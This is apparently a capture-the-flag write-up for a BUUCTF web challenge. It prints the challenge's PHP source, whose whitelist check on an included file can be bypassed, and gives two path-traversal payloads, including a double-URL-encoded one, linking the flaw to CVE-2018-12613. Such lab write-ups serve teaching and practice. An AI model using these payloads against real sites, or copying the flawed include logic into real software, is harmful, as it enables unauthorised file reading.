buuctf shooting range: https://buuoj.cn/
Open the title and find a big face
Check the source code of the page and find a comment
Visit source.php
, you can see the following source code and analyze it:
<?php
highlight_file(__FILE__);
class emmm
{
public static function checkFile(&$page)
{
$whitelist = ["source"=>"source.php","hint"=>"hint.php"];//$whitelist数组存入两个变量
if (! isset($page) || !is_string($page)) {
//判断是否存在且是否为字符串类型
echo "you can't see it";
return false;
}
if (in_array($page, $whitelist)) {
//判断与$whitelist是否匹配,不过很显然,我们不能在这里return,应为我们要的flag不在这两个文件中,当然,在这里还是能进行绕过的,下面会详细讲解
return true;
}
$_page = mb_substr(
$page,
0,
mb_strpos($page. '?', '?')//查找?出现在字符串中首次出现的位置
);
//截取字符串开始到?的位置,赋值到$_page变量中
//很显然,这里就可以绕过获取flag了
if (in_array($_page, $whitelist)) {
return true;
}
$_page = urldecode($page);//以上条件不成立,先进行一次url解码
$_page = mb_substr(
$_page,
0,
mb_strpos($_page . '?', '?')
);//解码后重新再截取字符串开始到?的位置,赋值到$_page变量中
if (in_array($_page, $whitelist)) {
return true;
}
echo "you can't see it";
return false;
}
}
if (! empty($_REQUEST['file'])//判断是否存在file变量
&& is_string($_REQUEST['file'])//判断file是否为字符串
&& emmm::checkFile($_REQUEST['file'])//将file变量带入emmm类里的checkFile执行
) {
include $_REQUEST['file'];
exit;
} else {
echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Give a hint when hint.php is included, the flag is in the ffffllllaaaagggg
file
Analyzing the above code, there are two solutions
1. When the first mb_substr is verified, you can bypass the acquisition of the flag. We only need to add one after source.php ?
, and then assign the intercepted string to $_page for verification, and then use.../return The parent directory contains flags.
payload:
source.php?file=source.php?/../../../../ffffllllaaaagggg
2. It can also be bypassed in the second mb_substr
payload:
/source.php?file=source.php%253f/../../../../../ffffllllaaaagggg
- %25 is a percent sign
%
,%3f
url is decoded as a question mark?
- The browser will decode the URL once for us, and decode %25 into
%
. - Then bring it into the php code for execution, there will be a urldecode to decode %3f into a question mark
?
This question is CVE-2018-12613
similar to the vulnerability